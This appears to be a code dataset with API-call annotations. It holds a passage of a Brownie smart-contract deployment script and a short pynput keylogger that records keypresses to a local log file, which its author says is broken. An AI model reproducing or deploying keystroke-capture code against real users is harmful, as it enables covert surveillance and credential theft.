"0xE60A7825A80509DE847Ffe30ce2936dfc770DB6b", # Common
"<KEY>", # Uncommon
"0xd56c12efd06252f1f0098a8fe517da286245c0a8", # Rare
"<KEY>", # Gov
]
deployer = accounts.load("husky")
beneficiary_address = deployer
publish_source = True
elif network.show_active() in ["mainnet", "mainnet-fork"]:
tokens = [
"<KEY>", # Founder
"0xE60A7825A80509DE847Ffe30ce2936dfc770DB6b", # Common
"<KEY>", # Uncommon
"0xd56c12efd06252f1f0098a8fe517da286245c0a8", # Rare
"<KEY>", # Gov
]
if network.show_active() == "mainnet-fork":
publish_source = False
deployer = accounts[0]
if network.show_active() == "mainnet":
deployer = accounts.load("minnow")
max_fee(input("Max fee in gwei: ") + " gwei")
priority_fee("2 gwei")
publish_source = True
else:
deployer = accounts.load("husky")
publish_source = True
return PACDaoBonus1.deploy(
beneficiary_address, tokens, {"from": deployer}, publish_source=publish_source
)
| [
"brownie.network.show_active",
"brownie.network.priority_fee",
"brownie.PACDaoBonus1.deploy",
"brownie.accounts.load"
] | [((1771, 1874), 'brownie.PACDaoBonus1.deploy', 'PACDaoBonus1.deploy', (['beneficiary_address', 'tokens', "{'from': deployer}"], {'publish_source': 'publish_source'}), "(beneficiary_address, tokens, {'from': deployer},\n publish_source=publish_source)\n", (1790, 1874), False, 'from brownie import ZERO_ADDRESS, PACDaoBonus1, accounts, network\n'), ((259, 280), 'brownie.network.show_active', 'network.show_active', ([], {}), '()\n', (278, 280), False, 'from brownie import ZERO_ADDRESS, PACDaoBonus1, accounts, network\n'), ((444, 465), 'brownie.network.show_active', 'network.show_active', ([], {}), '()\n', (463, 465), False, 'from brownie import ZERO_ADDRESS, PACDaoBonus1, accounts, network\n'), ((922, 944), 'brownie.accounts.load', 'accounts.load', (['"""husky"""'], {}), "('husky')\n", (935, 944), False, 'from brownie import ZERO_ADDRESS, PACDaoBonus1, accounts, network\n'), ((1023, 1044), 'brownie.network.show_active', 'network.show_active', ([], {}), '()\n', (1042, 1044), False, 'from brownie import ZERO_ADDRESS, PACDaoBonus1, accounts, network\n'), ((1706, 1728), 'brownie.accounts.load', 'accounts.load', (['"""husky"""'], {}), "('husky')\n", (1719, 1728), False, 'from brownie import ZERO_ADDRESS, PACDaoBonus1, accounts, network\n'), ((1345, 1366), 'brownie.network.show_active', 'network.show_active', ([], {}), '()\n', (1364, 1366), False, 'from brownie import ZERO_ADDRESS, PACDaoBonus1, accounts, network\n'), ((1467, 1488), 'brownie.network.show_active', 'network.show_active', ([], {}), '()\n', (1486, 1488), False, 'from brownie import ZERO_ADDRESS, PACDaoBonus1, accounts, network\n'), ((1526, 1549), 'brownie.accounts.load', 'accounts.load', (['"""minnow"""'], {}), "('minnow')\n", (1539, 1549), False, 'from brownie import ZERO_ADDRESS, PACDaoBonus1, accounts, network\n'), ((1620, 1642), 'brownie.network.priority_fee', 'priority_fee', (['"""2 gwei"""'], {}), "('2 gwei')\n", (1632, 1642), False, 'from brownie.network import max_fee, priority_fee\n')] |
import pynput
from pynput.keyboard import Key, Listener
count = 0
keys = []
def on_press(key):
global keys, count
keys.append(key)
count += 1
print("{0} key pressed on keyboard".format(key))
if count >= 4:
# This numerical value can be changed, however many keys are pressed, the log file will update
count = 0
write_file(keys)
keys = []
def write_file(keys):
with open("keylog.txt", "a") as f:
for key in keys:
k = str(key).replace("'","")
if k.find("space") > 0:
f.write('\n')
# This adds to a nice, clean log file for keylogging. If needed, change "w" to "a" (for creating a new file)
def on_release(key):
if key == Key.esc:
return False
# Key that will end the script, default is set to Escape (esc)
with Listener(on_press=on_press, on_release=on_release) as listener:
listener.join()
# Made by Damien/GunFighterMan101
# I really tried with this one don't heckle me because it's broken. Fix it if you are so upset. Thanks for understanding, 73.
| [
"pynput.keyboard.Listener"
] | [((835, 885), 'pynput.keyboard.Listener', 'Listener', ([], {'on_press': 'on_press', 'on_release': 'on_release'}), '(on_press=on_press, on_release=on_release)\n', (843, 885), False, 'from pynput.keyboard import Key, Listener\n')] |